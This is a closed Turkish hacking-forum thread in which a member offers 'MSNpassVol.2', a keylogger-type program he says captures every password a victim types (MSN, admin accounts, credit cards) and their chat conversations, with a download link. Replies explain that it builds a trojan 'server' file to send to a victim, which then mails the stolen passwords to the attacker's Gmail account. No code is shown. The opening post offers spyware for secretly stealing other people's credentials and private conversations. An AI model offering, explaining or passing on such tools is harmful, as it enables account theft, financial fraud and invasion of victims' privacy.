Msn kırma programı

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

!! BLOKE !!

Katılımcı Üye
26 Şub 2009
535
0
OFL!Ne
MSNpassVol.2; kullanıcının girdiği tüm şifreleri [msn, admin, kredi kartı, forum vb...
ele geçirebilen, chat programlarında [MSN, GTalk, Icq, Mirc vb..] kimlerle ne
konuşulduğu hakkında bilgi veren, kısaca karşı bilgisayardaki klavye kayıtlarını
düzenli bir şekilde size raporlayabilen programdır.

Program basit bi arayüze sahiptir bu yüzden yardım bölümü eklemedim,
kutulara ne dolduracağınızı veya butonların ne işe yaradığını öğrenmek
istiyorsanız nesnelerin üzerinde fareyle kısa bir süre bekleyin…. vistada çalışmaz.kullanabilmeniziçin google hesabınız olması gerekir şifreler oraya gelecek.



http://cepalemi.googlepages.com/MSNpassVol_1_.2.rar
 

temas03

Yeni üye
5 Kas 2008
10
0
deneriz ve sonucu görürüz bide bir ricam olcak ark. msn i hack lenmiş sizden yardım istiyorum edit//strawberry
mail adresi vermek yasaktır!
geri alıabilecek biri varsa cok memnum olurum
 

_EroS_

Yaşayan Forum Efsanesi
4 Mar 2009
8,670
4
39
Antalya
Doğru Sen Çok Msn Hacklemişsindir Bunla=) HACK Programı Denen Bişe Yoktur! Trojan Yedirirsin Şifreler Sana Gelir! + Programdada Zaten Trojan Mevcut Yani :):) Sakın Bana Virüssüz Hack olmaz Deme Neyin Ne Olduğunu Biliyorum Dostum ;)




 

crank666

Üye
30 Eki 2007
182
0
hocam server exe çıktı yazılanı teste bastım bi şey denemedim ama ***e geldik :D server oluşturdu silmio benm şifreler adama akacak :D
 
7 Haz 2009
132
0
istanbul
arkadaşlar o program işe yarıyor neden derseniz o program ile google hesabınızda olması lazım trjen oluşturuyo onu kurabana atıyosunuz kurban açtığı zaman onu gmail hesabınıza şifreler geliyo.
 
10 Haz 2009
159
0
Ya biz artık anlatmaktan bıktık siz hâlen ısrarla yok msn kırma yok msn şifre çalıcı ya böyle birşey yoooooooooook ! Msn hack diye birşey yoktur bu böyle bilene..
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.